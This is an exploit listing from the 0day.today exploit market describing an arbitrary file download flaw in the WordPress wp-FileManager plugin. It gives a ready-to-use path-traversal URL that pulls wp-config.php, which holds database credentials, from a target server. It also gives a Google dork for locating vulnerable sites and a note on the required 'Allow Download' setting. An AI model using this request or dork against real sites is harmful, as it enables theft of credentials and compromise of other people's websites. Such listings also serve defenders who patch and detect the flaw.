[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress wp-FileManager Arbitrary File Download Vulnerability

Author
ByEge
Risk
[
Security Risk High
]
0day-ID
0day-ID-20774
Category
web applications
Date add
15-05-2013
Platform
php
Title: Wordpress wp-FileManager Local File Download Vulnerability
Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Test Platform: Linux
Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg
Vuln. Plat.: Web Application
 
 
 
Google Dorks: inurl:wp-content/plugins/wp-filemanager/
Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
 
# Exploit-DB Note:
# In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.

#  0day.today [2024-11-16]  #